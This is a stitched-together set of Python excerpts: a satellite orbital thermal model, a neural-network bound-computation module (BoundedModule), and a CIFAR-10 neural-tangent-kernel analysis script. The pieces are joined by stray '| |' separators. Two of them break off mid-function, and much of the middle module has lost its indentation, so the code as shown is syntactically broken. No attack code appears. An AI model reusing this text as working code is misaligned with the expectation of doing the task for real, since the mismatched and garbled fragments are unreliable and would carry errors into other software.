        beta = 180 - beta
    faces = (
        getF12h2(h, beta),               # small side towards Earth
        getF12h2(h, 180 - beta),         # the "other" small side
        getF12h2(h, beta + 90),          # small side "towards" Earth
        getF12h2(h, 180 - (beta + 90)),  # small side "away from" Earth
        2 * getF12h2(h, 90),             # 2 small sides "perpendicular to" Earth
    )
    return sum(faces) / 6
## for compatibility with old code
def doOneCase(modelTitleText,alpha,epsilon, params="", verbose=False):
    """
    Run one thermal case end to end: apply the surface coating properties,
    compute heat fluxes and equilibrium temperatures, solve the cyclic orbit
    solution and return (time, temperature) arrays for one orbit.

    Parameters
    ----------
    modelTitleText : str
        title passed to titlePrint
    alpha : float
        solar absorptivity (alphaS) of the surface
    epsilon : float
        IR emissivity (epsT) of the surface; also used as alphaIR
    params : dict, str
        model parameter dict; "" (the sentinel default) loads getInputParamsDefault()
    verbose : bool
        if True, print intermediate fluxes and equilibrium temperatures
    """
    physConst = getPhysConstants()
    # NOTE(review): titlePrint and printEqTemp are not defined in this excerpt --
    # presumably notebook-level helpers; confirm they are in scope.
    titlePrint(modelTitleText)
    if (params == ""):
        print('using default parameters from getInputParamsDefault()')
        params = getInputParamsDefault()
    # Override the surface radiative properties with the requested coating
    params['alphaS'] = alpha
    params['epsT'] = epsilon
    params['alphaIR'] = params['epsT']
    # heat fluxes
    Q_sun_flux, Q_albedo_flux, Q_IR_flux, Q_int = getAllHeatQ(params)
    if (verbose):
        print('Q (sun, alb, IR, diss):', Q_sun_flux, Q_albedo_flux, Q_IR_flux, Q_int)
    # equilibrium solutions for the sunlit (hot) and eclipse (cold) phases
    Q_hot, Q_cold = getQin(params)
    print('Qsun=', Q_hot, ' Qeclipse=', Q_cold)
    Temp_hot = getTeq(Q_hot,params)
    Temp_cold = getTeq(Q_cold,params)
    if (verbose):
        printEqTemp('Hot', Temp_hot, physConst['KelToCel'])
        printEqTemp('Cold', Temp_cold, physConst['KelToCel'])
    # solve for time variation: thermal time constants and the normalized
    # phase durations x = t/t0 for the hot and cold phases
    t0H = getTimeConstant(params,Temp_hot)
    t0C = getTimeConstant(params,Temp_cold)
    xH = (1-params['etaP'])*params['PorbMin']*60/t0H
    xC = params['etaP']*params['PorbMin']*60/t0C
    Tmin, Tmax, tau0C, tauFC, tau0H, tauFH = solveBistableEquilibrium(xC, xH, Temp_cold, Temp_hot, 1000)
    # generate temperature arrays
    timeA, TempsA = getFullTempArray(params, Tmin, Tmax, Temp_cold, Temp_hot, t0C, t0H)
    if (verbose):
        print('doOneCase: temp. range =', np.min(TempsA), np.max(TempsA))
        print(' in Celsius: range =', np.min(TempsA-273.15), np.max(TempsA-273.15))
    return timeA, TempsA
def getTimeConstant(params, Teq):
    """Radiative thermal time constant [s] at equilibrium temperature *Teq*."""
    sigSB = getPhysConstants()['sigSB']
    heat_capacity = params['mass'] * params['C']
    return heat_capacity / sigSB / params['Atot'] / params['epsT'] / Teq ** 3
def getFullTempArray(params, Tmin, Tmax, Temp_cold, Temp_hot, t0C, t0H):
    """
    Build (time, temperature) arrays for one full orbit by stitching the
    cooling (eclipse) branch and the heating (sunlit) branch together.

    Parameters
    ----------
    params : dict
        model parameters; uses 'etaP' and 'PorbMin'
    Tmin, Tmax : float
        temperature extremes of the cyclic solution [K]
    Temp_cold, Temp_hot : float
        equilibrium temperatures of the eclipse / sunlit phases [K]
    t0C, t0H : float
        thermal time constants of the eclipse / sunlit phases [s]
    """
    # Clamp the extremes strictly between the two equilibrium temperatures;
    # getTempSolution diverges where T equals the phase equilibrium
    if Tmin >= Temp_hot:
        print('adjusting Tmin=', Tmin, 'to: Thot=', Temp_hot)
        Tmin = 0.998 * Temp_hot
    if Tmin <= Temp_cold:
        print('adjusting Tmin=', Tmin, 'to: Tcold=', Temp_cold)
        Tmin = 1.001 * Temp_cold
    if Tmax >= Temp_hot:
        print('adjusting Tmax=', Tmax, 'to: Thot=', Temp_hot)
        Tmax = 0.999 * Temp_hot
    # Cooling branch: Tmax down to Tmin, relaxing towards Temp_cold
    TempsC = np.linspace(Tmax, Tmin, 100)
    timeC = getTempSolution(TempsC, t0C, Temp_cold)
    # Heating branch: Tmin up to Tmax, relaxing towards Temp_hot
    TempsH = np.linspace(Tmin, Tmax, 200)
    timeH = getTempSolution(TempsH, t0H, Temp_hot)
    timeH[-1] = (1 - params['etaP']) * params['PorbMin'] * 60
    # Rescale both branches onto the eclipse / sunlit durations and concatenate
    timeOffset = params['etaP'] * params['PorbMin'] * 60
    timeHot = (1 - params['etaP']) * params['PorbMin'] * 60
    timeHshifted = timeH / np.max(timeH) * timeHot + timeOffset
    timeA = np.concatenate((timeC / np.max(timeC) * timeOffset, timeHshifted), axis=None)
    TempsA = np.concatenate((TempsC, TempsH), axis=None)
    return timeA, TempsA
def getNumSolution(params, Tstart, Tc=0.0, Pc=0.0):
    """
    Numerically integrate the satellite temperature over one orbit
    (eclipse followed by sunlight), iterating until the solution is cyclic.

    Parameters
    ----------
    params : dict
        model parameter dict (fluxes, geometry, thermal inertia, orbit)
    Tstart : float
        initial temperature guess at the start of eclipse [K]
    Tc, Pc : float
        extra arguments forwarded to nonSteadyStateTemp
        (presumably a control temperature and heater power -- TODO confirm)

    Returns
    -------
    tuple
        (time, Temperature) numpy arrays covering one full orbit.
    """
    orbPeriodMin = params['PorbMin']
    etaP = params['etaP']
    t_final_min = orbPeriodMin*etaP # eclipse duration in minutes
    t_step = 1.0 # integration step in seconds
    # Tstart = TempsBlack[0]
    Qs, Qe = getQin(params)
    epsT = params['epsT']
    Atot = params['Atot']
    C = params['C']
    mass = params['mass']
    physConst = getPhysConstants()
    sigmaSB = physConst['sigSB']
    # the duration of "sunshine", in units of eclipse time (=t_final_min)
    if (etaP>0):
        facSun = (1-etaP)/etaP
    else:
        facSun = 1.0
    # need to enforce cyclic boundary condition with iterations:
    # integrate eclipse then sunlight, then relax the starting temperature
    # towards the end-of-orbit temperature and repeat
    for k in range(0,25):
        time1, Temps1 = nonSteadyStateTemp(Tstart,t_final_min,t_step,Qe,C,mass,sigmaSB,epsT,Atot,Tc,Pc)
        tmax = facSun*t_final_min
        time2, Temps2 = nonSteadyStateTemp(Temps1[-1],tmax,t_step,Qs,C,mass,sigmaSB,epsT,Atot,Tc,Pc)
        Tstart = 0.5*(Tstart+Temps2[-1])
    # Stitch the eclipse and sunlit segments into one orbit
    time = np.concatenate((time1, (time2+time1[-1])), axis=None)
    Temperature = np.concatenate((Temps1, Temps2), axis=None)
    return time, Temperature
# given x and a tau0 array, find tau for each tau0
def getTauSolution(x, tau0, Nsteps=100):
    """For each starting value tau0[i], scan a grid of tau in [tau0[i], 1]
    and return the first grid point whose elapsed time x(tau, tau0) reaches
    the requested x.

    Entries whose grid never reaches x are left at 0.
    """
    tauFinal = 0*tau0
    for i in range(np.size(tau0)):
        thisTau0 = tau0[i]
        tauGrid = np.linspace(thisTau0, 1, Nsteps)
        # Scan from the second grid point (the first is tau0 itself, x=0);
        # stop at the first point past x instead of carrying a done-flag.
        for thisTau in tauGrid[1:]:
            if getXforTempSolution(thisTau, thisTau0) >= x:
                tauFinal[i] = thisTau
                break
    return tauFinal
# given tau and tau0, return x=t/t0
def getXforTempSolution(tau, tau0):
    """Dimensionless time x = t/t0 to evolve from tau0 to tau (tau = T/Teq)."""
    arctan_part = 0.5 * (np.arctan(tau) - np.arctan(tau0))
    log_part = 0.25 * (np.log((tau + 1) / (tau0 + 1)) - np.log((tau - 1) / (tau0 - 1)))
    return arctan_part + log_part
# given an array of temperatures, Teq and t0, return model time grid
def getTempSolution(T, t0, Teq):
    """Map a temperature grid T onto model times; time is zero at T[0]."""
    tau = T / Teq
    tau0 = tau[0]
    arctan_term = 0.5 * (np.arctan(tau) - np.arctan(tau0))
    log_term = 0.25 * (np.log((tau + 1) / (tau0 + 1)) - np.log((tau - 1) / (tau0 - 1)))
    return t0 * (arctan_term + log_term)
def solveBistableEquilibrium(xC, xH, TeqCold, TeqHot, Nsteps=100):
    """Solve the cyclic (bistable) equilibrium for the cooling/heating cycle.

    Scans a grid of starting tau0 values on the cooling branch, maps them
    through the heating branch, and finds the fixed point where the two
    curves cross.

    Returns:
        (TminEq, TmaxEq, tau0C, tauFinalC, tau0H, tauFinalH)

    Raises:
        RuntimeError: if no crossing is found on the tau0 grid (previously
            this fell through to a NameError on `tau0C`).
    """
    C1 = TeqCold / TeqHot
    tau0Carr = np.linspace(1.01, 3.0, Nsteps)
    tauFinalCarr = getTauSolution(xC, tau0Carr)
    tau0Harr = C1*tauFinalCarr
    tauFinalHarr = getTauSolution(xH, tau0Harr)
    tau0C2 = tauFinalHarr/C1
    ## now solve for tauFinalCarr(tau0Carr) = tauFinalCarr(tau0C2)
    ## to get tau0C and tauFinalC, and then tau0H, tauFinalH, and
    ## finally TminEq and TmaxEq
    # By construction tau0Carr and tau0C2 are increasing and at the first
    # point tau0C2[0] > tau0Carr[0], so take the first index where the
    # curves cross.
    for i in range(1, np.size(tau0C2)):
        if tau0Carr[i] >= tau0C2[i]:
            tau0C = tau0Carr[i]
            tauFinalC = tauFinalCarr[i]
            break
    else:
        raise RuntimeError('solveBistableEquilibrium: no crossing found on the tau0 grid')
    tau0H = C1 * tauFinalC
    tauFinalH = C1 * tau0C
    TminEq = tauFinalC * TeqCold
    TmaxEq = tau0C * TeqCold
    return TminEq, TmaxEq, tau0C, tauFinalC, tau0H, tauFinalH
############# old code from <NAME> (University of Washington) #################################
def nonSteadyStateTemp(Tinitial,t_final_min,t_step,Qheating,c,mass,sigma,emissivity,Area_sphere,Tc,Pc):
T = Tinitial # set the initial temp to the hot eq temp
Temps = []
# (garbled artifact line removed by review; original content was "| |")
import time
import os
import numpy as np
from collections import OrderedDict, deque, defaultdict
import torch
import torch.optim as optim
from torch.nn import DataParallel, Parameter, parameter
from .bound_op_map import bound_op_map
from .bound_ops import *
from .bounded_tensor import BoundedTensor, BoundedParameter
from .parse_graph import parse_module
from .perturbations import *
from .utils import *
from .adam_element_lr import AdamElementLR
import warnings
warnings.simplefilter("once")
class BoundedModule(nn.Module):
"""Bounded module with support for automatically computing bounds.
Args:
model (nn.Module): The original model to be wrapped by BoundedModule.
global_input (tuple): A dummy input to the original model. The shape of
the dummy input should be consistent with the actual input to the model
except for the batch dimension.
bound_opts (dict): Options for bounds. See
`Bound Options <bound_opts.html>`_.
device (str or torch.device): Device of the bounded module.
If 'auto', the device will be automatically inferred from the device of
parameters in the original model or the dummy input.
custom_ops (dict): A dictionary of custom operators.
The dictionary maps operator names to their corresponding bound classes
(subclasses of `Bound`).
"""
    def __init__(self, model, global_input, bound_opts=None, auto_batch_dim=True, device='auto',
                 verbose=False, custom_ops={}):
        """Convert `model` into a graph of bound-aware nodes.

        Args:
            model: the network to wrap. If it is already a BoundedModule, its
                attributes are shared directly and no conversion is performed.
            global_input: dummy input used to trace the model and determine
                the output shape.
            bound_opts (dict, optional): options merged over the defaults.
            auto_batch_dim (bool): whether to infer the batch dimension.
            device: 'auto' infers the device from the model parameters (or,
                for a parameter-free model, from the dummy input).
            verbose (bool): verbose conversion output.
            custom_ops (dict): operator name -> custom bound class.
                NOTE(review): mutable default argument; safe only as long as
                it is never mutated in place.
        """
        super(BoundedModule, self).__init__()
        if isinstance(model, BoundedModule):
            # Already converted: share every attribute of the source instance.
            for key in model.__dict__.keys():
                setattr(self, key, getattr(model, key))
            return
        if bound_opts is None:
            bound_opts = {}
        # Default options; caller-supplied bound_opts take precedence.
        default_bound_opts = {'ibp_relative': False, 'conv_mode': 'patches', 'sparse_intermediate_bounds': True, 'sparse_conv_intermediate_bounds': True}
        default_bound_opts.update(bound_opts)
        self.bound_opts = default_bound_opts
        self.verbose = verbose
        self.custom_ops = custom_ops
        self.auto_batch_dim = auto_batch_dim
        if device == 'auto':
            try:
                self.device = next(model.parameters()).device
            except StopIteration:  # Model has no parameters. We use the device of input tensor.
                self.device = global_input.device
        else:
            self.device = device
        self.global_input = global_input
        self.ibp_relative = self.bound_opts.get('ibp_relative', False)
        self.conv_mode = self.bound_opts.get('conv_mode', 'patches')
        if auto_batch_dim:
            # logger.warning('Using automatic batch dimension inferring, which may not be correct')
            # -1 marks the batch size as not yet known; filled in on first input.
            self.init_batch_size = -1
        # Keep a pristine copy of the original weights; object.__setattr__
        # bypasses nn.Module's attribute registration on purpose.
        state_dict_copy = copy.deepcopy(model.state_dict())
        object.__setattr__(self, 'ori_state_dict', state_dict_copy)
        model.to(self.device)
        # Trace the original model once to record the final output shape.
        self.final_shape = model(*unpack_inputs(global_input, device=self.device)).shape
        self.bound_opts.update({'final_shape': self.final_shape})
        self._convert(model, global_input)
        self._mark_perturbed_nodes()
        # set the default values here
        optimize_bound_args = {'ob_iteration': 20, 'ob_beta': False, 'ob_alpha': True, 'ob_alpha_share_slopes': False,
                               'ob_opt_coeffs': False, 'ob_opt_bias': False,
                               'ob_optimizer': 'adam', 'ob_verbose': 0,
                               'ob_keep_best': True, 'ob_update_by_layer': True, 'ob_lr': 0.5,
                               'ob_lr_beta': 0.05, 'ob_init': True,
                               'ob_single_node_split': True, 'ob_lr_intermediate_beta': 0.1,
                               'ob_lr_coeffs': 0.01, 'ob_intermediate_beta': False, 'ob_intermediate_refinement_layers': [-1],
                               'ob_loss_reduction_func': reduction_sum,
                               'ob_stop_criterion_func': lambda x: False,
                               'ob_input_grad': False,
                               'ob_lr_decay': 0.98 }
        # change by bound_opts
        optimize_bound_args.update(self.bound_opts.get('optimize_bound_args', {}))
        self.bound_opts.update({'optimize_bound_args': optimize_bound_args})
        self.next_split_hint = []  # Split hints, used in beta optimization.
        self.relus = []  # save relu layers for convenience
        for l in self._modules.values():
            if isinstance(l, BoundRelu):
                self.relus.append(l)
        # Collect all activations whose relaxation can be optimized.
        self.optimizable_activations = []
        for l in self._modules.values():
            if isinstance(l, BoundOptimizableActivation):
                self.optimizable_activations.append(l)
        # Beta values for all intermediate bounds. Set to None (not used) by default.
        self.best_intermediate_betas = None
        # Initialization value for intermediate betas.
        self.init_intermediate_betas = None
"""Some operations are non-deterministic and deterministic mode will fail. So we temporary disable it."""
def non_deter_wrapper(self, op, *args, **kwargs):
if self.bound_opts.get('deterministic', False):
torch.use_deterministic_algorithms(False)
ret = op(*args, **kwargs)
if self.bound_opts.get('deterministic', False):
torch.use_deterministic_algorithms(True)
return ret
def non_deter_scatter_add(self, *args, **kwargs):
return self.non_deter_wrapper(torch.scatter_add, *args, **kwargs)
def non_deter_index_select(self, *args, **kwargs):
return self.non_deter_wrapper(torch.index_select, *args, **kwargs)
def set_bound_opts(self, new_opts):
for k, v in new_opts.items():
assert v is not dict, 'only support change optimize_bound_args'
self.bound_opts[k].update(v)
def __call__(self, *input, **kwargs):
if "method_opt" in kwargs:
opt = kwargs["method_opt"]
kwargs.pop("method_opt")
else:
opt = "forward"
for kwarg in [
'disable_multi_gpu', 'no_replicas', 'get_property',
'node_class', 'att_name']:
if kwarg in kwargs:
kwargs.pop(kwarg)
if opt == "compute_bounds":
return self.compute_bounds(**kwargs)
else:
return self.forward(*input, **kwargs)
def register_parameter(self, name, param):
r"""Adds a parameter to the module.
The parameter can be accessed as an attribute using given name.
Args:
name (string): name of the parameter. The parameter can be accessed
from this module using the given name
param (Parameter): parameter to be added to the module.
"""
if '_parameters' not in self.__dict__:
raise AttributeError(
"cannot assign parameter before Module.__init__() call")
elif not isinstance(name, torch._six.string_classes):
raise TypeError("parameter name should be a string. "
"Got {}".format(torch.typename(name)))
elif name == '':
raise KeyError("parameter name can't be empty string \"\"")
elif hasattr(self, name) and name not in self._parameters:
raise KeyError("attribute '{}' already exists".format(name))
if param is None:
self._parameters[name] = None
elif not isinstance(param, Parameter):
raise TypeError("cannot assign '{}' object to parameter '{}' "
"(torch.nn.Parameter or None required)"
.format(torch.typename(param), name))
elif param.grad_fn:
raise ValueError(
"Cannot assign non-leaf Tensor to parameter '{0}'. Model "
"parameters must be created explicitly. To express '{0}' "
"as a function of another Tensor, compute the value in "
"the forward() method.".format(name))
else:
self._parameters[name] = param
def load_state_dict(self, state_dict, strict=False):
new_dict = OrderedDict()
# translate name to ori_name
for k, v in state_dict.items():
if k in self.node_name_map:
new_dict[self.node_name_map[k]] = v
return super(BoundedModule, self).load_state_dict(new_dict, strict=strict)
def _named_members(self, get_members_fn, prefix='', recurse=True):
r"""Helper method for yielding various names + members of modules."""
memo = set()
modules = self.named_modules(prefix=prefix) if recurse else [(prefix, self)]
for module_prefix, module in modules:
members = get_members_fn(module)
for k, v in members:
if v is None or v in memo:
continue
memo.add(v)
name = module_prefix + ('.' if module_prefix else '') + k
# translate name to ori_name
if name in self.node_name_map:
name = self.node_name_map[name]
yield name, v
def train(self, mode=True):
super().train(mode)
for node in self._modules.values():
node.train(mode=mode)
def eval(self):
super().eval()
for node in self._modules.values():
node.eval()
    def forward(self, *x, final_node_name=None, clear_forward_only=False):
        r"""Standard forward computation for the network.
        Args:
            x (tuple or None): Input to the model.
            final_node_name (str, optional): The name of the final node in the model. The value
            on the corresponding node will be returned.
            clear_forward_only (bool, default `False`): Whether only standard forward values stored
            on the nodes should be cleared. If `True`, only standard forward values stored on the
            nodes will be cleared. Otherwise, bound information on the nodes will also be cleared.
        Returns:
            output: The output of the model, or if `final_node_name` is not `None`, return the
            value on the corresponding node instead.
        """
        self._set_input(*x, clear_forward_only=clear_forward_only)
        # Kahn-style topological traversal: degree_in counts the not-yet-computed
        # inputs of each node; nodes with zero pending inputs are ready to run.
        degree_in = {}
        queue = deque()
        for key in self._modules.keys():
            l = self._modules[key]
            degree_in[l.name] = len(l.input_name)
            if degree_in[l.name] == 0:
                queue.append(l)  # root nodes (no inputs) are evaluated first
        forward_values = {}
        final_output = None
        while len(queue) > 0:
            l = queue.popleft()
            # Gather the already-computed values of this node's inputs.
            inp = [forward_values[l_pre] for l_pre in l.input_name]
            # A node depends on the network input if any of its inputs does.
            for l_pre in l.inputs:
                l.from_input = l.from_input or l_pre.from_input
            fv = l.forward(*inp)
            if isinstance(fv, torch.Size) or isinstance(fv, tuple):
                # Normalize shape-like outputs to tensors on the module device.
                fv = torch.tensor(fv, device=self.device)
            # Bypass nn.Module's attribute registration for the cached value.
            object.__setattr__(l, 'forward_value', fv)
            # infer batch dimension
            if not hasattr(l, 'batch_dim'):
                inp_batch_dim = [l_pre.batch_dim for l_pre in l.inputs]
                try:
                    l.batch_dim = l.infer_batch_dim(self.init_batch_size, *inp_batch_dim)
                except:
                    # NOTE(review): bare except re-raised with context; kept as-is.
                    raise Exception(
                        'Fail to infer the batch dimension of ({})[{}]: forward_value shape {}, input batch dimensions {}'.format(
                            l, l.name, l.forward_value.shape, inp_batch_dim))
            forward_values[l.name] = l.forward_value
            # Unperturbed node but it is not a root node. Save forward_value to value.
            # (Can be used in forward bounds.)
            if not l.from_input and len(l.inputs) > 0:
                l.value = l.forward_value
            # Unlock successors whose inputs are now all available.
            for l_next in l.output_name:
                degree_in[l_next] -= 1
                if degree_in[l_next] == 0:  # all inputs of this node have already set
                    queue.append(self._modules[l_next])
        if final_node_name:
            return forward_values[final_node_name]
        else:
            out = deque([forward_values[n] for n in self.output_name])
            def _fill_template(template):
                # Rebuild the caller's original (possibly nested) output
                # structure, consuming the flat results left to right.
                if template is None:
                    return out.popleft()
                elif isinstance(template, list) or isinstance(template, tuple):
                    res = []
                    for t in template:
                        res.append(_fill_template(t))
                    return tuple(res) if isinstance(template, tuple) else res
                elif isinstance(template, dict):
                    res = {}
                    for key in template:
                        res[key] = _fill_template(template[key])
                    return res
                else:
                    raise NotImplementedError
            return _fill_template(self.output_template)
"""Mark the graph nodes and determine which nodes need perturbation."""
def _mark_perturbed_nodes(self):
degree_in = {}
queue = deque()
# Initially the queue contains all "root" nodes.
for key in self._modules.keys():
l = self._modules[key]
degree_in[l.name] = len(l.input_name)
if degree_in[l.name] == 0:
queue.append(l) # in_degree ==0 -> root node
while len(queue) > 0:
l = queue.popleft()
# Obtain all output node, and add the output nodes to the queue if all its input nodes have been visited.
# the initial "perturbed" property is set in BoundInput or BoundParams object, depending on ptb.
for name_next in l.output_name:
node_next = self._modules[name_next]
if isinstance(l, BoundShape):
# Some nodes like Shape, even connected, do not really propagate bounds.
# TODO: make this a property of node?
pass
else:
# The next node is perturbed if it is already perturbed, or this node is perturbed.
node_next.perturbed | |
# Repository: goldblum/TruthOrBackpropaganda
"""Analyze NTKs."""
import argparse
import torch
import torchvision
import torchvision.transforms as transforms
import numpy as np
import scipy
import datetime
from collections import OrderedDict
import os
import csv
import matplotlib.pyplot as plt
import dl_myths as dl
from pytorch_cifar.models import WideResNet, BasicBlock, ResNet18
from WideResNet_pytorch.networks import Wide_ResNet
from torchvision.models import MobileNetV2, VGG
from torchvision.models.vgg import make_layers
# benchmark mode lets cuDNN autotune conv kernels; fine here since input sizes are fixed
torch.backends.cudnn.benchmark = True
parser = argparse.ArgumentParser(description='Analyze ntks')
parser.add_argument('--lr', default=0.01, type=float, help='learning rate')
parser.add_argument('--epochs', default=600, type=int, help='number of epochs for training')  # CHANGE TO 150
parser.add_argument('--switch_to_gd', default=10_000, type=int)
parser.add_argument('--stop_batchnorm', default=10_000, type=int)
parser.add_argument('--full_batch', action='store_true')
parser.add_argument('--path', default='/cmlscratch/jonas0/DL_myth_data/', type=str)
parser.add_argument('--table_path', default='tables/', type=str)
parser.add_argument('--width', default=1, type=float)
parser.add_argument('--print', default=50, type=int)
parser.add_argument('--bs', default=128, type=int)
parser.add_argument('--weight_decay', default=5e-4, type=float)
parser.add_argument('--net', default='MLP', type=str)
parser.add_argument('--rerun', action='store_true')
parser.add_argument('--pdist', action='store_true')
parser.add_argument('--sampling', default=25, type=int)
# debug
parser.add_argument('--dryrun', action='store_true')
args = parser.parse_args()
# Every architecture except MobileNetV2 needs an integer width multiplier;
# MobileNetV2 accepts a fractional width_mult.
if args.net != 'MobileNetV2':
    args.width = int(args.width)
# Run configuration collected into a single dict passed to the training helpers.
config = dict()
device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
dtype = torch.float
config['setup'] = dict(device=device, dtype=dtype)
config['batch_size'] = args.bs
config['epochs'] = args.epochs
config['print_loss'] = args.print
config['weight_decay'] = args.weight_decay
config['lr'] = args.lr
config['switch_to_gd'] = args.switch_to_gd
config['stop_batchnorm'] = args.stop_batchnorm
config['full_batch'] = args.full_batch
config['path'] = args.path
config['width'] = args.width
# CIFAR10 class names (kept for reference/plotting).
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
def main():
    """Check ntks in a single call.

    Builds the requested architecture, measures a batch-wise NTK sample
    (and, with --pdist, feature correlations) before and after training,
    saves the matrix plots and appends summary norms to csv tables.
    """
    print(f'RUNNING NTK EXPERIMENT WITH NET {args.net} and WIDTH {args.width}')
    print(f'CPUs: {torch.get_num_threads()}, GPUs: {torch.cuda.device_count()}')
    print(datetime.datetime.now().strftime("%A, %d. %B %Y %I:%M%p"))
    trainloader, testloader = dl.get_loaders('CIFAR10', config['batch_size'], augmentations=False, shuffle=False)
    # ---- Build the network ----
    if args.net == 'ResNet':
        net = WideResNet(BasicBlock, [2, 2, 2, 2], widen_factor=config['width'])
    elif args.net == 'WideResNet':  # meliketoy wideresnet variant
        net = Wide_ResNet(depth=16, widen_factor=config['width'], dropout_rate=0.0, num_classes=10)
    elif args.net == 'MLP':
        net = torch.nn.Sequential(OrderedDict([
            ('flatten', torch.nn.Flatten()),
            ('linear0', torch.nn.Linear(3072, config['width'])),
            ('relu0', torch.nn.ReLU()),
            ('linear1', torch.nn.Linear(config['width'], config['width'])),
            ('relu1', torch.nn.ReLU()),
            ('linear2', torch.nn.Linear(config['width'], config['width'])),
            ('relu2', torch.nn.ReLU()),
            ('linear3', torch.nn.Linear(config['width'], 10))]))
    elif args.net == 'TwoLP':
        net = torch.nn.Sequential(OrderedDict([
            ('flatten', torch.nn.Flatten()),
            ('linear0', torch.nn.Linear(3072, config['width'])),
            ('relu0', torch.nn.ReLU()),
            ('linear3', torch.nn.Linear(config['width'], 10))]))
    elif args.net == 'MobileNetV2':
        net = MobileNetV2(num_classes=10, width_mult=config['width'], round_nearest=4)
    elif args.net == 'VGG':
        cfg_base = [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M']
        # BUGFIX: the original comprehension kept only the ints and dropped
        # every 'M' max-pool marker, silently removing all pooling layers.
        # Scale the channel counts and preserve the markers.
        cfg = [c * config['width'] if isinstance(c, int) else c for c in cfg_base]
        print(cfg)
        net = VGG(make_layers(cfg), num_classes=10)
        net.classifier[0] = torch.nn.Linear(512 * 7 * 7 * config['width'], 4096)
    elif args.net == 'ConvNet':
        net = torch.nn.Sequential(OrderedDict([
            ('conv0', torch.nn.Conv2d(3, 1 * config['width'], kernel_size=3, padding=1)),
            ('relu0', torch.nn.ReLU()),
            # ('pool0', torch.nn.MaxPool2d(3)),
            ('conv1', torch.nn.Conv2d(1 * config['width'],
                                      2 * config['width'], kernel_size=3, padding=1)),
            ('relu1', torch.nn.ReLU()),
            # ('pool1', torch.nn.MaxPool2d(3)),
            ('conv2', torch.nn.Conv2d(2 * config['width'],
                                      2 * config['width'], kernel_size=3, padding=1)),
            ('relu2', torch.nn.ReLU()),
            # ('pool2', torch.nn.MaxPool2d(3)),
            ('conv3', torch.nn.Conv2d(2 * config['width'],
                                      4 * config['width'], kernel_size=3, padding=1)),
            ('relu3', torch.nn.ReLU()),
            ('pool3', torch.nn.MaxPool2d(3)),
            ('conv4', torch.nn.Conv2d(4 * config['width'],
                                      4 * config['width'], kernel_size=3, padding=1)),
            ('relu4', torch.nn.ReLU()),
            ('pool4', torch.nn.MaxPool2d(3)),
            ('flatten', torch.nn.Flatten()),
            ('linear', torch.nn.Linear(36 * config['width'], 10))
        ]))
    else:
        raise ValueError('Invalid network specified.')
    net.to(**config['setup'])
    # ---- Load (or persist) the initialization so reruns start identically ----
    try:
        net.load_state_dict(torch.load(config['path'] + 'Cifar10_' + args.net + str(config["width"]) + '_before.pth',
                                       map_location=device))
        print('Initialized net loaded from file.')
    except Exception:  # no stored initialization: save the fresh one for reuse
        path = config['path'] + 'Cifar10_' + args.net + str(config["width"]) + '_before.pth'
        if not args.dryrun:
            torch.save(net.state_dict(), path)
            print('Initialized net saved to file.')
        else:
            print(f'Would save to {path}')
    num_params = sum([p.numel() for p in net.parameters()])
    print(f'Number of params: {num_params} - number of data points: {len(trainloader.dataset)} '
          f'- ratio : {len(trainloader.dataset) / num_params * 100:.2f}%')
    # ---- NTK and feature statistics before training ----
    ntk_matrix_before = batch_wise_ntk(net, trainloader, samplesize=args.sampling)
    plt.imshow(ntk_matrix_before)
    plt.savefig(config['path'] + f'{args.net}{config["width"]}_CIFAR_NTK_BEFORE.png', bbox_inches='tight', dpi=1200)
    ntk_matrix_before_norm = np.linalg.norm(ntk_matrix_before.flatten())
    print(f'The total norm of the NTK sample before training is {ntk_matrix_before_norm:.2f}')
    param_norm_before = np.sqrt(np.sum([p.pow(2).sum().detach().cpu().numpy() for p in net.parameters()]))
    print(f'The L2 norm of the parameter vector is {param_norm_before:.2f}')
    if args.pdist:
        pdist_init, cos_init, prod_init = batch_feature_correlations(trainloader)
        pdist_init_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in pdist_init])
        cos_init_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in cos_init])
        prod_init_norm = np.mean([np.linalg.norm(cm.flatten()) for cm in prod_init])
        print(f'The total norm of feature distances before training is {pdist_init_norm:.2f}')
        print(f'The total norm of feature cosine similarity before training is {cos_init_norm:.2f}')
        print(f'The total norm of feature inner product before training is {prod_init_norm:.2f}')
        save_plot(pdist_init, trainloader, name='pdist_before_training')
        save_plot(cos_init, trainloader, name='cosine_before_training')
        save_plot(prod_init, trainloader, name='prod_before_training')
    # ---- Train (or load a trained checkpoint) ----
    net.to(**config['setup'])
    if torch.cuda.device_count() > 1:
        net = torch.nn.DataParallel(net)
    optimizer = torch.optim.SGD(net.parameters(), lr=config['lr'], momentum=0.9, weight_decay=config['weight_decay'])
    scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[60, 120, 160], gamma=0.2)
    loss_fn = torch.nn.CrossEntropyLoss()
    print(datetime.datetime.now().strftime("%A, %d. %B %Y %I:%M%p"))
    try:
        net.load_state_dict(torch.load(config['path'] + 'Cifar10_' + args.net + str(config["width"]) + '_after.pth',
                                       map_location=device))
        print('Net loaded from file.')
    except Exception:  # no trained checkpoint: train from scratch
        path = config['path'] + 'Cifar10_' + args.net + str(config["width"]) + '_after.pth'
        dl.train(net, optimizer, scheduler, loss_fn, trainloader, config, path=None, dryrun=args.dryrun)
        if not args.dryrun:
            torch.save(net.state_dict(), path)
            print('Net saved to file.')
        else:
            print(f'Would save to {path}')
    print(datetime.datetime.now().strftime("%A, %d. %B %Y %I:%M%p"))
    if isinstance(net, torch.nn.DataParallel):
        net = net.module
    # ---- NTK statistics after training ----
    param_norm_after = np.sqrt(np.sum([p.pow(2).sum().detach().cpu().numpy() for p in net.parameters()]))
    print(f'The L2 norm of the parameter vector is {param_norm_after:.2f}')
    ntk_matrix_after = batch_wise_ntk(net, trainloader, samplesize=args.sampling)
    plt.imshow(ntk_matrix_after)
    plt.savefig(config['path'] + f'{args.net}{config["width"]}_CIFAR_NTK_AFTER.png', bbox_inches='tight', dpi=1200)
    ntk_matrix_after_norm = np.linalg.norm(ntk_matrix_after.flatten())
    print(f'The total norm of the NTK sample after training is {ntk_matrix_after_norm:.2f}')
    ntk_matrix_diff = np.abs(ntk_matrix_before - ntk_matrix_after)
    plt.imshow(ntk_matrix_diff)
